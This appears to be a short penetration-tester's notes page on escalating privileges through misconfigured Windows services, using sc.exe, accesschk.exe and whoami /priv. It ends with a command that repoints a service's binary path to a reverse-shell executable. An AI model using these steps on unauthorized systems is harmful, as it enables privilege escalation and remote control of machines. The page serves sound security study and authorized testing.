Service Exploitation
Basic commands when abusing services to elevate privileges after being identified with a tool such as WinPEAS.
Basic Commands
# Query the configuration of a service
sc.exe qc $service_name
# Query the current status of a service
sc.exe query $service_name
# Modify an option on a service
sc.exe config $service_name $option= $value
# Start and stop a service
net start/stop $service_name
Accesschk.exe
Use Accesschk.exe to validate service permissions:
.\accesschk.exe /accepteula -uwcqv user $service_name
What we are looking for in the output is the
SERVICE_START
andSERVICE_STOP
permissions.We also want to confirm that it is running under a user with higher privileges (e.g.,
LocalSystem
)
Notes
Validate if you can start/stop the service or the machine. If you cannot then you may not be able to use it to escalate your privileges.
Check if we can reboot the system with
whoami /priv
An easy way to escalate privileges utilizing a service is to modify the binaries path. The following demonstrates an example of this:
sc config $service_name binpath= "\"C:\Windows\Tasks\reverse.exe\""
Last updated